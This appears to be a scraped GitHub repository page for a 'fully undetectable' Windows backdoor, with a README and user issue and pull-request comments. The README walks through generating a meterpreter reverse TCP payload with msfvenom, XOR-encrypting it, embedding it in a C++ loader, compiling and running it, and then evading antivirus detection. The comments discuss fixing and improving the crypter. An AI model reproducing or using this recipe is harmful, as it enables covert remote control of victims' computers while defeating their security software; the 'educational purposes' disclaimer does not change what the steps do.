Create a fully undetectable backdoor with simple steps.

Overview

🔒 Generate FUD backdoor with a Python Crypter 🔒

Follow the steps below to generate encrypted shellcode that can be used in a C++ executable.

Clone the repository

sudo git clone https://github.com/3ct0s/fud-backdoor.git
cd fud-backdoor

Generate The ShellCode

msfvenom -p windows/x64/meterpreter_reverse_tcp -e x86/shikata_ga_nai -i 10 LHOST=(IP) LPORT=(PORT) -f raw -o raw.txt

Encode the ShellCode With the XOR Encryption

python xor_encryptor.py raw.txt > xor_shellcode.txt

Add the encrypted shellcode to main.cpp

Now that you have the encrypted shellcode, you need to add it to the main.cpp file like this:

char b[] = /*xor_shellcode*/

Compile the main.cpp file

There is no specific way to do this; all you need to do is compile the C++ code into a Windows executable. Here are ways to do that: https://cutt.ly/BBOXP797

Execute the backdoor

Now you can execute the backdoor and enjoy the meterpreter shell.

What if it gets detected?

At some point, antivirus products will be able to detect this backdoor. Here are some things you can do to make it undetectable again.

You can try changing the payload protocol to http or https and using another port, adding gibberish C++ code to the main.cpp file, and playing with the SSL certificate of the session. Here is an article that covers this: https://www.darkoperator.com/blog/2015/6/14/tip-meterpreter-ssl-certificate-validation

If this still doesn't work, I can't think of another way to make the connection undetectable, since this is a meterpreter shell and they get detected quite easily.

DISCLAIMER

I am not responsible for any of your actions. This GitHub repository is made for educational purposes only!!!

Comments
  • not able to compile

    Hey there, thank you for your work here! I did everything like you showed in your video tutorial and the latest repository here, but I'm not able to compile the exe without errors. Not with c++dev and also not with Visual Studio...

    Any ideas? Did you miss some headers in the upload or something?

    opened by plumped 9
  • Code restructure/refactor

    About the xor_encryptor.py:

    1. Combined and composed all the code into functions (planning on making it object-oriented).
    2. Fixed the TypeError that was occurring after ord() was called on the individual bytes in the data parameter of the xor function (may have been caused by the way Python 3 was interpreting bytes, because it was giving the ord() function arguments of data type 'int', yet ord() works on individual characters of strings).
    3. Added more error handling around the code reading in the plain text bytes from the specified file at the command line.
    4. Improved execution time.

    About the main.cpp:

    1. Added a memory allocation check on the VirtualAlloc() return value to prevent unintended program crashes.
    2. Introduced a "key" variable to store the intended key/password to encrypt/decrypt during xoring of plain data.
    3. Fixed the shell-code's data type from signed char to unsigned char, since binaries are made of unsigned characters.
    opened by winterrdog 5
  • Don't print so many messages and make code a bit more readable

    What was done?

    I get that you are thankful for viewing the code, but it is annoying both when reading and compiling the code to see 48 messages; one is enough. Also just made the loop look more readable, because loops are usually written this way, so idk, it's my personal preference.

    opened by Roko191 2
  • Improved the code

    xor_encryptor.py:

    1. Refactored all the code that was responsible for xor encryption into an XorCipher class for easier porting into other programs and easier interface with the code.
    2. Added text-wrapping to the output xor'd shell-code array.

    main.cpp:

    1. Just formatted the code, nothing much (my text editor's default formatter caused it).
    2. Reserved and committed pages for the shell-code in one step, by calling VirtualAlloc() with MEM_COMMIT | MEM_RESERVE.

    You can also try to test the code on your end lemme know about what you may find. :)

    opened by winterrdog 0
  • ord() expected string of length 1, but int found

    Hello @3ct0s,

    I am studying how to create a fully undetectable backdoor, and I found your repository. Thanks to your work, I could create 'raw.txt'. But when I tried to create the encrypted shellcode, the Python script complained like below.

    $ python xor_encryptor.py raw.txt > xor_shellcode.txt
    
    Traceback (most recent call last):
      File "/home/sflab/Documents/workspace/fud-backdoor/xor_encryptor.py", line 19, in <module>
        ciphertext = xor(plaintext, KEY)
      File "/home/sflab/Documents/workspace/fud-backdoor/xor_encryptor.py", line 10, in xor
        output_str += chr(ord(current) ^ ord(current_key))
    TypeError: ord() expected string of length 1, but int found
    

    Do you have any thoughts on how to resolve the issue?

    Thanks for your reply in advance.

    opened by meteoricfarm 6
Owner
Dimitris Kalopisis